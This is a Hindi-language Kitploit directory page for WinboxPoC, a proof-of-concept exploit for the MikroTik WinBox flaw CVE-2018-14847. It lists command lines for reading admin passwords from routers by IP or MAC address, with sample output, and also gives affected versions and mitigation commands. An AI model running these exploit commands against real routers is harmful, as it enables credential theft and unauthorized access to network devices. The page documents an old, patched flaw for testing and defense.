Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WinboxPoC — Winbox गंभीर भेद्यता (CVE-2018-14847) के लिए प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/basucert/winboxpoc
पासवर्ड हमलेभेद्यता विश्लेषणशोषणजानकारी एकत्र करनानेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगArchived
GitHubbasucert/winboxpoc

WinboxPoC

Winbox गंभीर भेद्यता (CVE-2018-14847) के लिए प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
5204615 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

WinboxExploit

यह महत्वपूर्ण WinBox भेद्यता (CVE-2018-14847) का एक प्रूफ ऑफ कॉन्सेप्ट है, जो सादे पाठ पासवर्ड की मनमानी फ़ाइल पढ़ने की अनुमति देता है।

यह भेद्यता बहुत पहले ठीक कर दी गई है, इसलिए यह परियोजना समाप्त हो गई है और अब समर्थित या अपडेट नहीं की जाएगी। आप इसका फोर्क कर सकते हैं और स्वयं इसे अपडेट कर सकते हैं।

ब्लॉग पोस्ट

https://n0p.me/winbox-bug-dissection/

आवश्यकताएँ

  • Python 3+ यह स्क्रिप्ट Python 2.x या उससे निचले संस्करण के साथ नहीं चलेगी।

उपयोग कैसे करें

स्क्रिप्ट का उपयोग कमांडलाइन में सरल तर्कों के साथ किया जाता है।

WinBox (TCP/IP)

भेद्यता का शोषण करें और पासवर्ड पढ़ें।

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

उदाहरण:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC सर्वर WinBox (लेयर 2)

आप फ़ाइलें तब भी निकाल सकते हैं जब डिवाइस के पास IP पता न हो।

स्थानीय रूप से जुड़े Mikrotik डिवाइसों के लिए सरल डिस्कवरी जाँच।

root@kitploit:~
python3 MACServerDiscover.py

उदाहरण:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

भेद्यता का शोषण करें और पासवर्ड पढ़ें।

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

उदाहरण:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

संवेदनशील संस्करण

2015-05-28 से 2018-04-20 तक के सभी RouterOS संस्करण इस शोषण के लिए संवेदनशील हैं।

Mikrotik डिवाइस जो निम्नलिखित RouterOS संस्करण चला रहे हैं:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

अधिक जानकारी के लिए देखें: https://blog.mikrotik.com/security/winbox-vulnerability.html

शमन तकनीकें

  • राउटर को ऐसे RouterOS संस्करण में अपग्रेड करें जिसमें फिक्स शामिल हो।
  • राउटर पर WinBox सेवा को अक्षम करें।
  • आप निम्नलिखित के साथ WinBox सेवा तक पहुँच को विशिष्ट IP पतों तक सीमित कर सकते हैं:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • आप WinBox सेवा तक बाहरी पहुँच को अस्वीकार करने के लिए कुछ फ़िल्टर नियम (ACL) का उपयोग कर सकते हैं:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • mac-winbox सेवा तक पहुँच को सीमित करना अनुमत इंटरफेस निर्दिष्ट करके किया जा सकता है:
root@kitploit:~
/tool mac-server mac-winbox

कॉपीराइट

  • ईरान के CERTCC (https://certcc.ir) द्वारा प्रायोजित। सर्वाधिकार सुरक्षित।
टूल डाउनलोड करें